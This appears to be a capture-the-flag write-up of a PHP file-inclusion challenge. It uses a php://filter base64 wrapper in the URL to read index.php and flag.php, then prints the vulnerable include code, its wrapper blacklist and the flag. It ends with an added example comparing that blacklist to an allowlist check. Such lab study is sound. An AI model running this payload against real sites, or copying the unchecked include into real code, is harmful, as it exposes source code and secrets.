BUUCTF-Web-[ACTF2020 新生赛]Include
Open the challenge environment, which looks like this:
Click tips:
Combined with the challenge name, this should be about file inclusion.
Tried to list the current directory, which failed; the system function is probably filtered.
Try to fetch the source of the index page:
http://99ccaa16-4df9-405d-b767-c67e1bec70bd.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=./index.php
The index page source, base64-encoded:
PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V7CgllY2hvICc8YSBocmVmPSI/ZmlsZT1mbGFnLnBocCI+dGlwczwvYT4nOwp9Cj8+Cg==
Decoded:
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
exit('hacker!');
}
if($file){
include($file);
}else{
echo '<a href="?file=flag.php">tips</a>';
}
?>
Fetch the source of flag.php:
http://99ccaa16-4df9-405d-b767-c67e1bec70bd.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=./flag.php
The source is as follows:
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YmY5MzNlMGQtY2EzZi00ODc0LThmNGMtYmIwMDQzM2ZiZGU2fQo=
Decoded as follows, which yields the flag:
<?php
echo "Can you find out the flag?";
//flag{bf933e0d-ca3f-4874-8f4c-bb00433fbde6}
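Added example, not part of the writeup or the challenge: the substring blacklist from the decoded index.php beside an allowlist-based resolver, run over the same inputs, to show why the php://filter wrapper passes the first check and not the second. The allowed file names and the temporary directory are assumptions for this example.

```php
<?php
// Added example (not the challenge's code): the challenge's blacklist
// beside an allowlist check, applied to the same constructed inputs.

// The challenge's check: deny a few wrapper prefixes by substring match.
// Anything not in the list, such as php://filter, is allowed through.
function blacklist_allows(string $file): bool {
    foreach (["php://input", "zip://", "phar://", "data:"] as $bad) {
        if (stristr($file, $bad) !== false) {
            return false;
        }
    }
    return true;
}

// Hardened check: only a fixed set of plain file names may be included,
// and the resolved path must be an existing file inside $base.
// The set of names is an assumption for this example.
function allowlist_resolve(string $file, string $base): ?string {
    $allowed = ["index.php", "flag.php"];
    if (!in_array($file, $allowed, true)) {
        return null;                       // wrappers never match exactly
    }
    $root = realpath($base);
    $path = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;                       // missing file or outside $base
    }
    return $path;
}

// Constructed web root with placeholder pages so the example runs offline.
$base = sys_get_temp_dir() . "/include_demo_" . getmypid();
mkdir($base);
file_put_contents("$base/flag.php", "<?php // placeholder\n");

$inputs = [
    "php://filter/read=convert.base64-encode/resource=./flag.php",
    "data://text/plain;base64,AAAA",
    "flag.php",
];
foreach ($inputs as $in) {
    printf("%-62s blacklist=%-7s allowlist=%s\n", $in,
        blacklist_allows($in) ? "pass" : "blocked",
        allowlist_resolve($in, $base) === null ? "blocked" : "pass");
}

unlink("$base/flag.php");
rmdir($base);
```

The first input is the exact wrapper used in the writeup: the blacklist reports "pass" because none of its four substrings occur in it, while the allowlist reports "blocked"; only the bare name flag.php passes both.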